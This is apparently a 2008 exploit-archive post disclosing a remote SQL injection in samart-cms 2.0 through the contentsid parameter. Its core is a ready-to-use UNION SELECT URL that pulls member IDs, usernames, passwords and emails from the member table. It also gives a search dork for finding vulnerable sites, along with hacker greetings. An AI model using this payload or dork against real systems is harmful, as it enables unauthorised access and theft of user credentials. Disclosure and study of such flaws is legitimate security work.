samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability
# Published : 2008-06-19
# Author : dun
# Previous Title : Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities
# Next Title : CMS-BRD (menuclick) Remote SQL Injection Vulnerability

:::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun  dun[at]strcpy.pl ]

 #################################################################
 #   [ samart-cms 2.0 ]   Remote SQL Injection Vulnerability     #
 #################################################################
 #
 # Script site: http://samart.6x.to/
 # 
 # Vuln: 
 # http://site.com/site.php?contentsid=-1+UNION%20SELECT+1,2,4,3,concat_ws(char(58),m_id,m_username,m_password,m_email),6,7+from+member/*
 #
 # 
 # Dork example: "Powered by samart-cms"
 #
 ###############################################
 # Greetz: D3m0n_DE * sid.psycho * str0ke and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# www.Syue.com [2008-06-19]